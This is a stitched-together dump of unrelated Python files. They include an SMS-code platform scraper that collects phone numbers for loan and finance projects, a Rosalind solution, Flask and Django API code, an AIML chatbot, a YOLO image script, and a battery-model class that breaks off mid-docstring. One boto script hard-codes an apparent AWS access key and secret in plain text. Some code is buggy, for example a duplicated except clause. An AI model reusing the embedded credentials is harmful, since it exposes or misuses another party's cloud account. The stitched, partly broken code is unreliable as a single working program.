with gevent.Timeout(10, requests.Timeout):
try:
if request_type == "post" or request_type == "POST":
response = requests.post(url=url, headers=self.headers, data=payload, allow_redirects=False)
else:
response = requests.get(url=url, headers=self.headers, params=payload, allow_redirects=False)
if not response.text:
retry_time += 1
logging.info(u"返回内容为空,重试中。。。")
if retry_time > 3:
pass
else:
return ""
if response.status_code == 200:
return response.text
else:
logging.info(u"状态码是 {status_code}, 返回空内容。".format(status_code=response.status_code))
return ""
except requests.Timeout:
retry_time += 1
logging.info(u"连接超时,重试中。。。")
if retry_time > 3:
pass
else:
continue
except requests.Timeout:
retry_time += 1
logging.info(u"连接超时,重试中。。。")
if retry_time > 3:
pass
else:
continue
except Exception as e:
print(e)
# 登录, 获得用户token
def login(self):
url = self.api_prefix + 'loginIn'
payload = {
"name": self.user_name,
"password": self.user_pwd
}
text = self.request(url=url, request_type="get", payload=payload)
if text:
try:
status_code, token = text.split("|")
if status_code == "0":
raise Exception
self.token = token
self.logger.info(u'登录成功!')
except Exception:
self.logger.info(u'登录失败!')
# 获取项目
def get_items(self):
# 返回格式
# [{"name":项目名称,"price":项目价格,"projectID":项目ID,"remark":项目备注,"result":项目状态}]
# 因为没有项目类别,所以统一设置为 "1"
url = self.item_url
payload = {
'userID': self.user_name,
'key': self.token,
'name': u"[a-z0-9贷金融理财网富服所投宝钱易线创汇信贷众资银]"
}
text = self.request(url=url, request_type="get", payload=payload)
items = []
if text:
json_text = json.loads(text)
if len(json_text) < 0 or json_text[0]['result'] != "111":
self.logger.info(u'获取项目列表失败!')
else:
for item in json_text:
item_dict = dict(zip(
['item_id', 'item_name', 'item_price', 'item_type'],
[item["projectID"], item["name"], item["price"], "1"]))
item_type = item_dict.get('item_type')
if item_type is not None:
items.append(item_dict)
return items
# 获取号码
def get_phone(self, item_id):
# item_id: 项目ID
url = self.api_prefix + 'getPhone'
payload = {
'token': self.token,
"sid": item_id
}
text = self.request(url=url, request_type="get", payload=payload)
phones = []
if text:
try:
status_code, phones_str = text.split("|")
if status_code == "0":
raise Exception
phones = phones_str.split(",")
except Exception:
pass
return phones
def add_black_list(self, item_id, phone):
url = self.api_prefix + 'addBlacklist'
payload = {
'token': self.token,
"sid": item_id,
"phone": str(phone)
}
text = self.request(url=url, request_type="get", payload=payload)
phones = []
if text:
try:
status_code, msg = text.split("|")
if status_code == "0":
raise Exception(msg)
self.logger.info(u'加黑指定手机号码成功!')
except Exception as e:
self.logger.info(u'加黑指定手机号码失败!{msg}'.format(msg=e.message))
return phones
def get_specific_phone(self, item_id, phone):
url = self.api_prefix + 'getPhone'
payload = {
'token': self.token,
"sid": item_id,
"phone": str(phone)
}
text = self.request(url=url, request_type="get", payload=payload)
if text:
try:
status_code, phones_str = text.split("|")
if status_code == "0":
raise Exception(phones_str)
return ['1']
except Exception as e:
self.logger.info(u'获取指定手机号码失败!{msg}'.format(msg=e.message))
return []
def release_phone(self):
url = self.api_prefix + 'cancelAllRecv'
payload = {'token': self.token}
text = self.request(url=url, request_type="", payload=payload)
if text:
try:
status_code, msg = text.split("|")
if status_code == "0":
raise Exception(msg)
self.logger.info(u'释放所有手机号码成功!')
except Exception as e:
self.logger.info(u'释放所有手机号码失败!{msg}'.format(msg=e.message))
def exit(self):
self.logger.info(u'退出成功!')
def main():
ebozz = Ebozz()
ebozz.login()
ebozz.release_phone()
if os.path.exists(ebozz.items_file):
items = get_items_from_file(ebozz.items_file)
ebozz.logger.info(u'从文件中读取__%s__网站可接收验证码项目%d个。' % (
str(ebozz.__class__).split('.')[1].strip("'>"), len(items)))
else:
items = ebozz.get_items()
save_items_with_json(items, ebozz.items_file)
ebozz.logger.info(u'一共获取__%s__网站可接收验证码项目%d个。' % (
str(ebozz.__class__).split('.')[1].strip("'>"), len(items)))
for item in items[:]:
max_time_per_item = 1000
retry_time_per_item = 0
phones_per_item_set = set()
saved_count = 0
replicate_count = 0
three_increase = [1, 1, 1]
increase_length = 0
empty_count = 0
while 1:
if replicate_count > 15 or retry_time_per_item >= max_time_per_item or empty_count >= 10:
break
item_name = item.get('item_name')
item_id = item.get('item_id')
item_price = float(item.get('item_price'))
item_type = item.get('item_type')
ebozz.logger.info(u'项目: __%s__, ID: __%s__, 价格: __%s__' % (item_name, item_id, item_price))
if item_id and item_price <= 10:
# if item_price <= 0.5:
# count = 20
# else:
# count = int(10.0/item_price)
num = ebozz.get_phone(item_id)
ebozz.logger.info(num)
if len(num) == 0:
empty_count += 1
ebozz.logger.info(u'没有获取到有效号码')
continue
# 同一个item_id查询出的不重复的号码
last_length = len(phones_per_item_set)
phones_per_item_set.add(num[0])
current_length = len(phones_per_item_set)
increase_length = current_length - last_length
phone_items = []
current_time = time.strftime(
'%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
phone_item = {
'item_name': item_name, # 项目名称
'item_id': item_id, # 项目ID
'crawl_time': current_time, # 采集时间
'item_price': item_price, # 项目价格
'item_type': item_type, # 项目类型
'phone': num[0], # 手机号
'portal': u'速码', # 来源门户
}
new_item = add_item_fields(phone_item)
phone_items.append(new_item)
if increase_length > 0:
save_items(phone_items, ebozz.phone_file)
saved_count += 1
ebozz.release_phone()
retry_time_per_item += 1
# 依据重复次数判断该项目的卡号已被大致取完
replicate_count += (1 - increase_length)
three_increase[2] = three_increase[1]
three_increase[1] = three_increase[0]
three_increase[0] = increase_length
print three_increase
# 退出, 让token失效
ebozz.exit()
# 重新登录, 刷新token
ebozz.login()
else:
ebozz.logger.info(u'项目价格超过10元, 放弃.')
print "",
ebozz.logger.info(u'采集结束' + '-' * 30)
if __name__ == '__main__':
main()
|
#047: Expected Number of Restriction Sites
#http://rosalind.info/problems/eval/
#Given: A positive integer n (n=1,000,000), a DNA string s of even length at most 10, and an array A of length at most 20, containing numbers between 0 and 1.
n = 10
s = 'AG'
A = [0.25, 0.563, 0.422]
#If parsing from file:
#f = open('rosalind_eval.txt', 'r')
#contents = f.read().strip()
#f.close()
#contents = contents.split('\n')
#n = int(contents[0])
#s = contents[1]
#A = [float(i) for i in contents[2].split(' ')]
#Return: An array B having the same length as A in which B[i] represents the expected number of times that s will appear as a substring of a random DNA string t of length n, where t is formed with GC-content A[i] (see "Introduction to Random Strings").
B = []
def getExpected(n,s,gc):
options = n + 1 - len(s)
expected = 0
for o in range(options):
p = 1
for c in s:
if c == 'A' or c == 'T':
p *= (1-gc)/2
else:
p *= gc/2
expected += p
return expected
B = [getExpected(n,s,a) for a in A]
print B
#If writing to file:
#w = open('rosalind_eval_output.txt', 'w')
#for b in B:
#w.write(str(b) + ' ')
#w.close()
|
"""
문제
N개의 숫자가 공백 없이 쓰여있다. 이 숫자를 모두 합해서 출력하는 프로그램을 작성하시오.
입력
첫째 줄에 숫자의 개수 N (1 ≤ N ≤ 100)이 주어진다. 둘째 줄에 숫자 N개가 공백없이 주어진다.
출력
입력으로 주어진 숫자 N개의 합을 출력한다.
예제 입력 1
1
1
예제 출력 1
1
예제 입력 2
5
54321
예제 출력 2
15
"""
a=int(input())
N=input()
def sum_c(a):
L=[]
result=0
for i in range(0, len(a)):
L.append(a[i])
for i in range(0, len(a)):
result+=int(L[i])
return result
print(sum_c(N)) |
import logging
import sys
from io import StringIO
logger = logging.getLogger('test')
logger.setLevel(logging.DEBUG)
buffer_stream = StringIO()
buffer_handler = logging.StreamHandler(stream=buffer_stream)
console_handler = logging.StreamHandler(stream=sys.stdout)
buffer_handler.setLevel(logging.DEBUG)
console_handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
buffer_handler.setFormatter(formatter)
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
logger.addHandler(buffer_handler)
|
import json
from flask import request
from requirementmanager.app import app
from requirementmanager.mongodb import (
requirement_collection, archive_requirement_collection
)
from requirementmanager.dao.requirement_list import RequirementListMongoDBDao
from requirementmanager.dao.archive import ArchiveRequirementListMongoDBDao
from requirementmanager.utils.handle_api import handle_response
from requirementmanager.api.requirement.analyze._utils import (
wrap_add_single_requirement, wrap_tree_requirements,
wrap_edit_single_requirement, wrap_compared_requirements
)
from requirementmanager.grpc_client.client import GrpcClient
META_SUCCESS = {'status': 200, 'msg': '冲突检测成功!'}
@app.route('/requirement/analyze/conflict', methods=['POST'])
@handle_response
def requirement_analyze_conflict():
body = request.json
target_data = body['target_data']
# 分析需求的类型,值为add_single, tree, edit_single,针对不同类型会有不同的wrap方式
target_type = body['target_type']
scope = body['scope'] # {"project_id": str, "version": str}
# 如果version为None,则说明是当前版本,使用requirement_collection
# 否则为归档版本
if not scope['version']:
requirement_list_dao = RequirementListMongoDBDao(
requirement_collection
)
compared_reqs_list = requirement_list_dao.get_requirement_list(
project_id=scope['project_id']
)
else:
requirement_list_dao = ArchiveRequirementListMongoDBDao(
archive_requirement_collection
)
compared_reqs_list = requirement_list_dao.get_requirement_list(
project_id=scope['project_id'], version=scope['version']
)
# wrap target_data
if target_type == 'add_single':
target_reqs_dict = wrap_add_single_requirement(target_data)
elif target_type == 'tree':
target_reqs_dict = wrap_tree_requirements(target_data)
elif target_type == 'edit_single':
target_reqs_dict = wrap_edit_single_requirement(target_data)
# wrap compared_reqs_list
compared_reqs_dict = wrap_compared_requirements(compared_reqs_list)
# 合并成一个dict,转换成列表,调用grpc获取结果
sum_reqs_dict = dict(compared_reqs_dict, **target_reqs_dict)
sum_reqs_list = [req for req in sum_reqs_dict.values()]
# 调用grpc
resp = GrpcClient().conflictdetect(json.dumps({'items': sum_reqs_list}))
resp = json.loads(resp)
print(resp)
# wrap 返回结果
res = []
for item in resp['conflicts']:
id0 = item['requirements'][0]['id']
id1 = item['requirements'][1]['id']
if (id0 not in target_reqs_dict) and (id1 not in target_reqs_dict):
continue
if id0 in target_reqs_dict:
req0 = {
'name': target_reqs_dict[id0]['name'],
'description': target_reqs_dict[id0]['description'],
}
else:
req0 = {
'name': compared_reqs_dict[id0]['name'],
'description': compared_reqs_dict[id0]['description'],
}
if id1 in target_reqs_dict:
req1 = {
'name': target_reqs_dict[id1]['name'],
'description': target_reqs_dict[id1]['description'],
}
else:
req1 = {
'name': compared_reqs_dict[id1]['name'],
'description': compared_reqs_dict[id1]['description'],
}
res.append({'_type': item['type'], 'req0': req0, 'req1': req1})
return {
'meta': META_SUCCESS,
'data': res
}
|
import aiml
# Create the kernel and learn AIML files
mybot=aiml.Kernel()
#mybot.setbotpredicate("name","Armin")
mybot.learn('AIMLData.aiml')
mybot.respond("SK1 BotMaster")
mybot.respond("SK2 Student")
mybot.respond("SK3 Floki")
mybot.respond("SK4 Robot")
mybot.respond("SK5 Egypt")
mybot.respond("SK6 Male")
mybot.respond("SK7 Chat Robot")
mybot.respond("SK8 128MB")
mybot.respond("SK9 1/7/2017")
mybot.respond("SK10 Portsaid,Egypt")
mybot.respond("SK11 artificial intelligence")
mybot.respond("SK12 Abdelfatah el sisi")
mybot.respond("SK13 HER ")
mybot.respond("SK14 Muslim")
mybot.respond("SK15 electricity")
mybot.respond("SK16 Black")
mybot.respond("SK17 Electronic Brain")
mybot.respond("SK18 Tom Hanks")
mybot.respond("SK19 Egyptian/American ")
mybot.respond("SK20 chat online")
mybot.respond("SK21 Dust it off")
mybot.respond("SK22 artificial intelligence with python 2nd Edition")
mybot.respond("SK23 Computer Software")
mybot.respond("SK24 Sharmofers")
#mybot.respond("SK25 www.floki.com")
mybot.respond("SK26 test")
mybot.respond("SK27 English")
mybot.respond("SK28 no girlfriend")
mybot.respond("SK29 One ")
mybot.respond("SK30 What's your favorite movie?")
mybot.respond("SK31 Mediator type")
mybot.respond("SK32 I am not really interested in sex")
mybot.respond("SK33 I am always trying to stop fights")
mybot.respond("SK34 I don't pay much attention to my feelings")
mybot.respond("SK35 I always put others before myself")
#mybot.respond("SK35 info@Floki.org")
while True:
message = raw_input("Enter your message >> ")
if message == "quit":
exit()
# elif message == "save":
# kernel.saveBrain("bot_brain.brn")
else:
print mybot.respond(message)
|
import pandas as pd
import json
from boto.s3.connection import S3Connection
from boto.s3.key import Key
year = 2015
tournament = 'Valero Texas Open'
# create connection to bucket
c = S3Connection('AKIAIQQ36BOSTXH3YEBA','cXNBbLttQnB9NB3wiEzOWLF13Xw8jKujvoFxmv3L')
# create connection to bucket
b = c.get_bucket('public.tenthtee')
k = Key(b)
k.key = 'playerData/vvToPgaMapping'
player_map = k.get_contents_as_string()
player_map = json.loads(player_map)
salaries = pd.read_csv('https://s3.amazonaws.com/public.tenthtee/vv/VVSalaries.csv')
salaries_map = {}
for index,row in salaries.iterrows():
pga_name = player_map['players'][row['PlayerName']]
salaries.set_value(index,'PlayerName',pga_name)
salaries_map[pga_name] = int(row['Salary'])
salaries_map = json.dumps(salaries_map)
k2 = Key(b)
k2.key = 'vv/salaries'
k2.set_contents_from_string(salaries_map)
k2.make_public()
k3 = Key(b)
k3.key = 'vv/' + str(year) + '/' + tournament + '/salaries'
k3.set_contents_from_string(salaries_map) |
from core.renderers import CoreJSONRenderer
class TopicRenderer(CoreJSONRenderer):
object_label = 'topic'
pagination_object_label = 'topics'
pagination_count_label = 'topicsCount'
class PreferenceRenderer(CoreJSONRenderer):
object_label = 'preference'
pagination_object_label = 'preferences'
pagination_count_label = 'preferencesCount'
class MediumRenderer(CoreJSONRenderer):
object_label = 'medium'
pagination_object_label = 'mediums'
pagination_count_label = 'mediumsCount' |
# while-loop 循环:一直执行代码,知道判断条件为 False 才停止
# 可以用来做循环任务
# 使用建议
# 1.尽量少用 while-loop ,大部分时候使用 for-loop 是更好的选择
# 2.重复检查 while 语句, 确定测试布尔表达式 最终会变成 False
# 3.如果不确定,就在 while-loop 的结尾打印测试值, 看看结果
i = 0
numbers = []
while i < 6:
print "At the top i is %d" % i
numbers.append(i)
i += 1
print "Numbers now: ", numbers
print " At the bottom i is %d" % i
print "The numbers:"
for num in numbers:
print num |
#!/usr/bin/env python
#-*-coding:utf-8-*-
'''
In England the currency is made up of pound, £, and pence,
p, and there are eight coins in general circulation:
1p, 2p, 5p, 10p, 20p, 50p, £1 (100p) and £2 (200p).
It is possible to make £2 in the following way:
1×£1 + 1×50p + 2×20p + 1×5p + 1×2p + 3×1p
How many different ways can £2 be made using any number of coins?
'''
import timeit
# slow
def loop(total):
cnt = 0
for i in range(int(total/200)+1):
for j in range(int(total/100)+1):
for k in range(int(total/50)+1):
for l in range(int(total/20)+1):
for m in range(int(total/10)+1):
for n in range(int(total/5)+1):
for o in range(int(total/2)+1):
if i*200+j*100+k*50+l*20++m*10+n*5+o*2 <= total:
cnt += 1
return cnt
# fast
def recursive(total, coins):
if coins == [1]:
return 1
cnt = 0
for i in range(0, int(total/coins[0])+1):
cnt += recursive(total-coins[0]*i, coins[1:])
return cnt
if __name__ == '__main__':
print loop(200)
print recursive(200, [200, 100, 50, 20, 10, 5, 2, 1])
print timeit.Timer('problem_031.loop(200)', 'import problem_031').timeit(1)
print timeit.Timer('problem_031.recursive(200, [200, 100, 50, 20, 10, 5, 2, 1])',
'import problem_031').timeit(1)
|
from django.urls import path
from .views import (dashboard,
team_members,
profile,
create_team,
leave_team,
membership_request,
cancel_request,
accept_request,
remove_request,
search_users)
urlpatterns = [
path('', dashboard, name='dashboard'),
path('team/', team_members, name='team-members'),
path('<str:username>/profile/', profile, name='profile'),
path('team/create', create_team, name='create-team'),
path('team/leave', leave_team, name='leave-team'),
path('team/membership', membership_request, name='membership-request'),
path('team/cancel-request', cancel_request, name='cancel-request'),
path('team/accept-request', accept_request, name='accept-request'),
path('team/remove-request', remove_request, name='remove-request'),
path('team/search-users', search_users, name='search-users'),
] |
from detect import YOLO
from PIL import Image
import imutils
import cv2
import os
yolo = YOLO()
files = os.listdir('./test/')
for file in files:
if file.endswith('jpg') or file.endswith('bmp'):
image_path = './test/' + file
image = cv2.imread(image_path)
boxes = yolo.detect_image(Image.open(image_path))
print(image_path)
if len(boxes) > 0:
for box in boxes:
x1 = box[0]
y1 = box[1]
x2 = box[2]
y2 = box[3]
score = box[4]
predicted_class = box[5]
cv2.rectangle(image, (x1, y1), (x2, y2), (0, 255, 0), 2)
#label = str(predicted_class) + ':' + str(score)[:4]
label = str(predicted_class) + ' ' + str(score * 100)[:4] + '%'
cv2.putText(image, label, (x1, y1-10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)
image = imutils.resize(image, width=720)
cv2.imshow('', image)
cv2.waitKey(0)
|
__author__ = 'Stuart'
from flask import jsonify, request, g, abort, url_for, current_app
from .. import db
from ..models import Post, Permission
from . import api
from .decorators import permission_required
from .errors import forbidden
@api.route('/posts/')
def get_posts():
"""
Contains data items in a page, yay.
:return:
"""
page = request.args.get('page',1,type=int)
pagination = Post.query.paginate(
page,
per_page=current_app.config['FLASKY_POSTS_PER_PAGE'],
error_out=False)
posts = pagination.items
prev = None
if pagination.has_prev:
prev = url_for('api.get_posts', page=page-1, _external=True)
next_posts = None
if pagination.has_next:
next_posts = url_for('api.get_posts', page=page+1, _external=True)
return jsonify({
'posts':[post.to_json() for post in posts],
'prev': prev,
'next': next_posts,
'count': pagination.total
})
@api.route('/posts/<int:id>')
def get_post(id):
"""
404 error handler is at app level but will provide JSON if client requests that format
If response customized to web service desired, 404 error handler can be overridden in blueprint
:param id:
:return:
"""
post = Post.query.get_or_404(id)
return jsonify(post.to_json())
@api.route('/posts/', methods=['POST'])
@permission_required(Permission.WRITE_ARTICLES)
def new_post():
"""
Post handler for blog post resources inserts a new blog post into db.
Wrapped in permission required that ensures authenticated user has permission to write.
Creation of post is straightforward due to error handling we implemented earlier. A blog post is created from JSON
data and author explicitly assigned as authenticated user.
After model written to DB, 201 status code returned and Location header added with URL of new resource.
Body of response includes new resource in JSON, so client doesn't have to issue another GET right after creation.
:return:
"""
post = Post.from_json(request.json)
post.author = g.current_user
db.session.add(post)
db.session.commit()
return jsonify(post.to_json()), 201, {'Location': url_for('api.get_post', id=post.id, _external=True)}
@api.route('/posts/<int:id>', methods=['PUT'])
@permission_required(Permission.WRITE_ARTICLES)
def edit_post(id):
"""
permission checks a bit more complex. Check for permission to write is with decorator, but to allow user to edit
a blog post, func must also check for user is author or admin. If this check had to be done a lot, a decorator could
be created to do that.
Since application doesn't allow deletion of posts, handler for DELETE request doesn't need to be implemented.
:param id:
:return:
"""
post = Post.query.get_or_404(id)
if g.current_user != post.author and not g.current_user.can(Permission.ADMINISTER):
return forbidden("Not permitted")
post.body = request.json.get('body', post.body)
db.session.add(post)
return jsonify(post.to_json())
|
from datetime import datetime
from mongoengine import *
from db.config import _MongoengineConnect
from db.sentences.sentence import Sentences
connect(_MongoengineConnect)
class Comments(Document):
belongsto_sentence = ReferenceField((Sentences))#,dbref=True
content = StringField(max_length=50)
love = IntField()
add_date = DateTimeField(default=datetime.now, required=True) #datetime.utcnow datetime.now()
|
"""
A simple guess-that-number game. Players take turns guessing a secret number
between lower and upper (normally 0 and 100). After a guess, all players are
informed of the guess as well as if the secret number was lower or higher. The
game ends when some player guesses the secret number correctly. That player is
the winner.
"""
__all__ = ['GTNTracker', 'GTNHoster']
from .hoster import GTNHoster
from .tracker import GTNTracker |
#from .fitting import circuit_fit, computeCircuit, calculateCircuitLength
#from .plotting import plot_nyquist
import matplotlib.pyplot as plt
import numpy as np
### to find confidence intervals for fit parameters:
# SE(Pi) = sqrt[(SS/DF) * conv(i,i)]
# Pi : ith adjustable parameter
# SS: sum of squarewd residuals
# DF: degrees of fredom (number of data points - number of parameters)
# Conv(i,i) : i-thj diagonal element of covariance matrix
class BaseBattery:
"""Base class for physics-based battery models"""
def __init__(self, initial_parameters=None, estimate_parameters=None, name=None,
algorithm=None, bounds=None, chemistry=None, verbose=False):
# initalize class attributes
# assert isinstance(initial_parameters, dict), \
# "Initial parameters must be a dictionary of name-value pairs"
# self.initial_guess = initial_guess
self.estimate_parameters = estimate_parameters
# from .fitting import opt_wrap
self.initial_fit = 0
self.name = name
self.bounds = bounds
self.verbose = verbose
self.initial = None
self.conf_ = None
self.inplace = None
# self.opt = opt_wrap
def _is_fit(self):
""" check if model has been fit (parameters_ is not None) """
if self.parameters_ is not None:
return True
else:
return False
def charge(self, t=None, current=0.5, from_current_state=False, p=None, trim=False, internal=False):
"""The base wrapper for the model, used for simple charging. Automatically
transitions from cc to cv depending upon final time.
Inputs Description
------ ------------------------
t A list or numpy array of times to sample at (optional)
current A value for charge current
from_current_state Whether or not the simulation should start from the
current state or not - defaults to False, which
simulates the battery from a discharged state
p Defaults to none - present only for wrapping in an optimizer
trim Defaults to False, a value of true will remove the padded numbers
at the end, where False will allow padded values.
Output Description
------ ------------------------
out A list of values for [time, voltage, current] of the simulation"""
if t is None:
t = np.linspace(0,5000*(1/current),500)
if p is None:
if self.initial_fit == 0:
p = self.initial
else:
p = self.initial
p[self.estimate_inds] = self.fitted_parameters
if from_current_state:
solve = self.model([*p, current, 1], t, initial=self.current_state, internal=internal)
self.current_state = solve[1][1:]
self.hist.append(solve[0])
if internal:
if trim:
return [solve[0][:,solve[0][2]<-0.01], solve[-1]]
else:
return [solve[0], solve[-1]]
else:
if trim:
return solve[0][:,solve[2]<-0.01]
else:
return solve[0]
else:
solve = self.model([*p, current, 1], t, initial=self.charge_ICs, internal=internal)
self.current_state = solve[1][1:]
self.hist.append(solve[0])
if internal:
if trim:
return [solve[0][:,solve[0][2]<-0.01], solve[-1]]
else:
return [solve[0], solve[-1]]
else:
if trim:
return [solve[0][:,solve[2]<-0.01]]
else:
return [solve[0]]
def discharge(self, t=None, current=0.5, from_current_state=False, p=None, trim=False, internal=False):
"""The base wrapper for the model, used for simple discharging.
Inputs Description
------ ------------------------
t A list or numpy array of times to sample at (optional)
current A value for charge current
from_current_state Whether or not the simulation should start from the
current state or not - defaults to False, which
simulates the battery from a discharged state
p Defaults to none - present only for wrapping in an optimizer
trim Defaults to False, a value of true will remove the padded numbers
at the end, where False will allow padded values.
Output Description
------ ------------------------
out A list of values for [time, voltage, current] of the simulation"""
if t is None:
t = np.linspace(0,4000*(1/current),500)
if p is None:
if self.initial_fit == 0:
p = self.initial
else:
p = self.initial
p[self.estimate_inds] = self.fitted_parameters
if from_current_state:
solve = self.model([*p, current*-1, 1], t, initial=[*self.current_state[:-1], current*-1], internal=internal)
self.current_state = solve[1][1:]
self.hist.append(solve[0])
if internal:
if trim:
return [solve[0][:,:np.where(solve[0][2]==0)[0][0]+1], solve[-1]]
else:
return [solve[0], solve[-1]]
else:
if trim:
return [solve[0][:,:np.where(solve[0][2]==0)[0][0]+1]]
else:
return [solve[0]]
else:
# print([*p, current*-1, 1], t[-1], self.discharge_ICs, internal)
solve = self.model([*p, current*-1, 1], t, initial=self.discharge_ICs, internal=internal)
self.current_state = solve[1][1:]
self.hist.append(solve[0])
if internal:
if trim:
return [solve[0][:,:np.where(solve[0][2]==0)[0][0]+1], solve[-1]]
else:
return [solve[0], solve[-1]]
else:
if trim:
return [solve[0][:,:np.where(solve[0][2]==0)[0][0]+1]]
# return solve[0][:,solve[2]<-0.01]
else:
return [solve[0]]
def cycle(self, current=0.5, n=500, charge_first=False, p=None, trim=False):
"""This function calls either a charge then discharge, or a discharge followed
by a change. When charge_first is set to False, it will start from a charged
state and discharge, follower by a charge. Otherwise, it will do them
in reverse order.
Inputs Description
------ ------------------------
current A value for charge and discharge current. These must be the same.
charge_first Whether the charge simulation should be run first. Defaults to False.
n The number of points to sample in each charge / discharge cycle. Time is
automatically calculated as tf=4000*(1/current), to ensure the
entire charge or discharge cycle is captured.
p Defaults to none - present only for wrapping in an optimizer
trim Defaults to False, a value of true will remove the padded numbers
at the end, where False will allow padded values.
Output Description
------ ------------------------
out A list of values for [time, voltage, current] of the simulation"""
current = abs(current)
if charge_first:
solve = [self.charge(np.linspace(0,4000*(1/current), n), p=p, trim=trim)]
solve.append(self.discharge(np.linspace(0,4000*(1/current), n), from_current_state=True, p=p, trim=trim))
solve[-1][0] += solve[0][0,-1]
return np.concatenate(solve, axis=1)
else:
solve = [self.discharge(np.linspace(0,4000*(1/current), n), p=p, trim=trim)]
solve.append(self.charge(np.linspace(0,4000*(1/current), n), from_current_state=True, p=p, trim=trim))
solve[-1][0] += solve[0][0,-1]
return np.concatenate(solve, axis=1)
def piecewise_current(self, times, currents, n_steps=50, from_current_state=False, p=None, internal=False):
"""This function wraps charge and discharge in order to chain them together to
create the ability to simulate arbitrary piecewise currents. Only supports
stair-style current stepping, ramps are not supported.
Inputs
------- ----------------------
times: A list of values representing number of seconds at that current
currents: A list of values representing value of the current
Example:
spm.piecewise_current([50,100,30,40],[1,-0.5,.5,.3])
where a negative current represents charging and a positive current
represents discharge."""
assert isinstance(times, list), 'times must be a list'
assert isinstance(currents, list), 'Currents must be a list'
assert len(times) == len(currents), 'times and currents must be the same length'
solve = []
curr = []
count = 0
if not from_current_state:
self.current_state = self.discharge_ICs
for t, c in zip(times, currents):
# print(t,c)
tt = np.linspace(0, t, n_steps)
# if len(solve)>1:
# if solve[-1][-1,-2] <= 2.5:
# print(solve[-1][-1,-2])
# break
# else:
curr.append(c)
# if solve[-1]
# try:
# print(solve[-1], t, c)
# except:
# pass
if c > 0:
try:
# if internal:
out = self.discharge(tt, current=c, from_current_state=True, p=p, internal=internal)
# else: # need to nest one layer deeper for downstream code
# out = self.discharge(tt, current=c, from_current_state=True, p=p, internal=internal)
# out = self.discharge(tt, current=c, from_current_state=True, p=p, internal=internal)
# print(len(out))
except IndexError:
print('failed')
pass
# out = [tt, np.ones(len(tt))*2.5, np.ones(len(tt))*c]
else:
try:
# if internal:
# out = self.charge(tt, current=c*-1, from_current_state=True, p=p, internal=internal)
# else: # need to nest one layer deeper for downstream code
out = [self.charge(tt, current=c*-1, from_current_state=True, p=p, internal=internal)]
except IndexError:
print('failed')
pass
# out = np.array([tt, np.ones(len(tt))*4.2, np.ones(len(tt))*c])
# print(out)
# add times together
# if count > 0:
# print(solve[-1])
# out[0] += solve[-1][0,-1]
if internal:
solve.append(out[-1])
else:
# add times together
# print(len(solve))
# print(solve,out[0][0], out[0])
if count > 0:
# print(solve[-1][0][-1])
# print(out[0][0])
out[0][0] += solve[-1][0][-1]
solve.append(out[0])
count += 1
# print(solve)
if internal:
# print([s.shape for s in solve])
# print(solve[-1].shape)
solve = np.concatenate(solve, axis=0)
else:
# print('concatenating')
# print(solve)
# print([x.shape] for x in solve)
solve = np.concatenate(solve, axis=1)
self.hist.append(solve)
return solve, curr
#
# def summary(self):
# """
# Returns a Latex render of the equations and node spacings
# used for the current model, in addition to a table
# containing the names and values of the parameters
# """
#
# return
#
def opt_wrap(self, x0, currents_type, verbose=False):
"""The general optimization wrapping function - this function
serves to call the numerical solution and calculate the
root mean squared error at each experimental timepoint
using cubic interpolation. This ensures that the
solver has sufficient accuracy while also allowing for
direct comparisons with the experimental data."""
from .fitting import rmse
x = np.copy(self.initial)
# print(self.estimate_inds)
x[self.estimate_inds] = x0
error = 0
print(self.count)
self.count+=1
try:
if currents_type == 'constant':
for t, v, c in zip(self.t_exp, self.v_exp, self.currents):
if c > 0:
self.current_state = self.discharge_ICs
solve = self.discharge(t, current=c, from_current_state=True, p=x)
print(len(solve[0]))
error += rmse(solve[0][1], v)
else:
self.current_state = self.charge_ICs
# print(t)
solve = self.charge(t, current=-c, from_current_state=True, p=x)
# print(solve)
# print(len(solve[0][1]))
# print(solve[0])
error += rmse(solve[1], v)
else:
solve = self.piecewise_current(self.t_exp, self.currents, p=x)
error += rmse(solve[0][:,1], self.v_exp)
if verbose:
print(error, x0)
except:
error = 100
print('failed')
return error
def fit(self, t_exp, v_exp, currents, currents_type='constant', method="Nelder-Mead", bounds=None, re=0, maxiter=100, tol=None, **kwargs):
"""Model-specific fitting function
Parameters
----------
t_exp: A numpy array containing the series of time values for experimental data
v_exp: A numpy array containing the series of voltage values for experimental data
method: A method to pass to Scipy.optimize.minimize, suggestions include:
- 'Nelder-Mead'
- 'SLSQP'
- 'L-BFGS-B'
bounds: Bounds for the given parameters
"""
# enforce typing
assert isinstance(t_exp,(np.ndarray, list)),\
'time array is not of type np.ndarray'
# assert isinstance(t_exp[0], (float, int, np.int32, np.float64)),\
# 'time array does not contain a number'
assert isinstance(v_exp, (np.ndarray, list)),\
'voltage array is not of type np.ndarray'
# if not interpolate:
assert currents_type in ['constant','piecewise'], \
'currents_type should be either constant or piecewise'
if currents_type == 'constant':
assert len(t_exp) == len(currents), \
'time and current lengths should match'
assert len(t_exp) == len(v_exp), \
'time and voltage lengths should match'
if currents_type == 'piecewise':
assert len(t_exp) == len(currents), \
'time samples and current samples should be of the same length'
self.currents = currents
self.currents_type = currents_type
self.tol = tol
self.maxiter = maxiter
self.count = 0
if re == 0:
self.t_exp = t_exp
self.v_exp = v_exp
# # call the optimizer
from scipy.optimize import minimize
res = minimize(self.opt_wrap, self.initial[self.estimate_inds], args=(self.currents_type, self.verbose),
bounds=bounds, method=method, tol=self.tol, options={'maxiter': self.maxiter})
self.fitted_parameters = res.x
self.error = res.fun
self.initial_fit = 1
self.opt_result = res
return res
def refit(self, method="Nelder-Mead", maxiter=100):
assert self.initial_fit == 1, \
'Please call fit before calling refit'
self.initial[self.estimate_inds] = self.fitted_parameters
self.fit(self.t_exp, self.v_exp, self.currents, method=method, re=1, maxiter=maxiter)
return
def generate_data(self, filename, n, currents, loglist='auto', pars=None, bounds=None,
type='sobol', distribution='uniform', sample_time=None,
time_samples=100, summary=True, internal=True, just_sample=False, verbose=False):
"""
This function uses the existing Julia kernel to generate a set of data, similar to how the
optimization function works. Since this julia kernel already exists, the calculations are note made in parallel.
In the future, a separate file may exist which generates the data in parallel. It is recommended to call fit() first,
in order to establish t_exp. Otherwise, time can be manually input.
Parameters
----------
filename: The filename for the h5 file the data is saved in (using h5py)
